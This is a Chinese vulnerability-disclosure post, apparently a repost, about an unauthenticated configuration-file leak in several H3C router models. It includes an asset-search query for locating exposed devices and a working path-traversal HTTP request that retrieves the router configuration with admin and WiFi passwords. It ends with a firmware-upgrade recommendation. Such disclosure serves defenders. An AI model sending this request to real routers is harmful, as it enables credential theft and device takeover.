文章总结: 文档披露了H3C多款路由器型号存在的敏感信息泄露漏洞。攻击者无需认证即可通过特定路径遍历获取配置文件,导致后台账号密码及WiFi密码等泄露。文章提供了漏洞影响范围、资产测绘语法及详细的POC代码,并建议用户升级固件修复漏洞。 综合评分: 76 文章分类: 漏洞POC,漏洞预警,渗透测试
H3C路由器敏感信息泄露漏洞 附POC
原创
安服仔 安服仔
北风漏洞复现文库
2026年2月24日 11:04 广东
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
#
01
—
漏洞名称
H3C路由器敏感信息泄露漏洞
#
02
—
影响版本
影响范围:涉及H3C ER6300G2、ER5200G2、GR2200、ER8300G2-X、H100等多款路由器型号。
03
—
漏洞简介
H3C路由器是新华三集团推出的网络设备,涵盖消费级、企业级等多种类型,广泛应用于家庭、中小企业及大型企业网络环境。H3C路由器凭借其高性能、高可靠性和丰富的功能,为不同规模的网络提供了全面的解决方案,满足用户对网络速度、覆盖范围、安全性和管理便捷性的需求。攻击者可通过特定路径访问路由器配置文件,未经身份验证即可获取后台账号、密码、WiFi名称及密码等敏感信息,进而控制路由器或进行内网渗透。
04
—
资产测绘
app="H3C-Ent-Router" && title=="ER6300G2系统管理"
05
—
漏洞复现
POC
GET /userLogin.asp/../actionpolicy_status/../ER6300G2.cfg HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Priority: u=0, iPragma: no-cacheCache-Control: no-cache
06
—
修复建议
升级路由器固件至最新版本
07
—
往期回顾
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:北风漏洞复现文库 安服仔 安服仔《H3C路由器敏感信息泄露漏洞 附POC》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。











评论